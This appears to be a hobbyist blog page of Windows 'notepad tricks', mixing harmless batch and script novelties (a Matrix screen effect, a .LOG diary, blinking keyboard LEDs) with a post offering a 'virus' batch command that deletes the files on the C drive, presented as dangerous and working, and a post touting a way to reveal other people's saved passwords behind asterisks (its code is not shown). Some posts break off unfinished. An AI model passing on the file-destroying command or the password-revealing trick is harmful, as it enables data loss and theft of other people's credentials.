Pages

Saturday, January 25

TOP 3 NOTEPAD TRICKS

 1. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Notepad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
 %random% %random%goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.

NOTE : You can change color 02 to any other number(for instance 03 for blue)

2. Creating Virus That Format C Drive

computer virus
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
  
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

NOTE: PLEASE DON'T TRY IT ON YOUR OWN LAPTOP.USE IT ON YOUR RISK.

3. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time when you reopen notepad.

ENJOY!!

Creating undeletable folder in Windows

Aah!!after long time I am goin' to write a post on some interesting trick....Well it's being 5:00 a.m and suddenly I think to write something in my blog. First of all,I apologize for not writing the article from long time. So without wasting your time,I come to the main point.
                                          Well today I want to share on windows trick i.e. to create undeletable, unrenamable folderMost of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software.

Sunday, March 3

Pranking

STEP 1 : Just Go to crushbits
and sign up for Free

STEP 2 : There you will get a a link something like this
http://www.crushbits.com/findcrush/15790

STEP 3 :

Saturday, February 2

KEYBOARD LED FLUCTUATING TRICK


Today i will be showing you an interesting trick which will let your keyboard led light to dance. Basically we will be creating a vbscript to make caps lock, num lock and scroll lock to perform this trick. So lets get started.

 How to do that ?

 1. Open Notepad and copy below codes into it.
 

2. Then save this file as led.vbs (.vbs is must)

 3. Open your save file and see your keyboard led blinking like disco lights.

 How to disable blinking Led ? 

1. First open Task Manager [ctrl+alt+del ]

2. Then Go to process tab.

3. Select wscript.exe

4. Click on End process.
Enjoy....

Friday, January 18

PASSWORD IDENTIFYING

   This is trick which will let you to see password behind asterisks. You might be thinking what is asterisks. It is dots or stars you see when you type password. This trick will let you to see password behind asterisks. Often people save their password on browser so this trick will let you get their password easily.

    * Go to the page that contain password in asterisks.
    * Now copy the following code.

Popular Posts